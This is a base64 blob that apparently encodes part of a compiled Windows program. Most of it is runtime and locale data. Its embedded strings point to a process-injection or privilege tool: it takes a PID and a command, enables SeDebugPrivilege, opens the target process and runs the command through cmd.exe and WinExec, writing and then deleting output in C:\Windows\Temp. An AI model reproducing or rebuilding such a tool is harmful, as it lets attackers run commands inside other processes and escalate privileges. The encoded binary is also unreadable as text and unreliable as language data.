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IAcBAACAAAAAAAAAP////8AAAAAQAAAADDAAwAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAgHgQAuMADAJDAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA0MADAAAAAAAAAAAA6MADABDBAwAAAAAAAAAAAAAAAAAAAAAAIB4EAAEAAAAAAAAA/////wAAAABAAAAAuMADAAAAAAAAAAAAAAAAAEgeBAAAAAAACAAAAP////8AAAAAQAAAADjBAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAABQwQMAAAAAAAAAAABgwQMAAAAAAAAAAAAAAAAASB4EAAAAAAAAAAAA/////wAAAABAAAAAOMEDAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAHAeBACwwQMAiMEDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAADIwQMAAAAAAAAAAADowQMA6MADABDBAwAAAAAAAAAAAAAAAAAAAAAAAAAAAHAeBAACAAAAAAAAAP////8AAAAAQAAAALDBAwAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAACwHgQAOMIDABDCAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAUMIDAAAAAAAAAAAAYMIDAAAAAAAAAAAAAAAAALAeBAAAAAAAAAAAAP////8AAAAAQAAAADjCAwAAAAAAAAAAAAAAAABwHgQAAgAAAAAAAAAAAAAABAAAAFAAAACwwQMAAAAAAAAAAAAAAAAAIB4EAAEAAAAAAAAAAAAAAAQAAABAAAAAuMADAAAAAAAAAAAAAAAAAEgeBAAAAAAACAAAAAAAAAAEAAAAQAAAADjBAwAAAAAAAAAAAAAAAAABAAAAEAAAAAQAAAAAHwQAKMMDAADDAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAQMMDAAAAAAAAAAAAaMMDAIjCAwCwwgMA2MIDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfBAADAAAAAAAAAP////8AAAAAQAAAACjDAwAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAABQHwQAuMMDAJDDAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA0MMDAAAAAAAAAAAA6MMDAGDCAwAAAAAAAAAAAAAAAAAAAAAAUB8EAAEAAAAAAAAA/////wAAAABAAAAAuMMDAAAAAAAAAAAAAAAAAAAAAAABAAAABAAAACjEAwAAAAAAAAAAAFDEAwAIygMAyMgDADDJAwAAAAAAAAAAAAAAAAAAAAAAA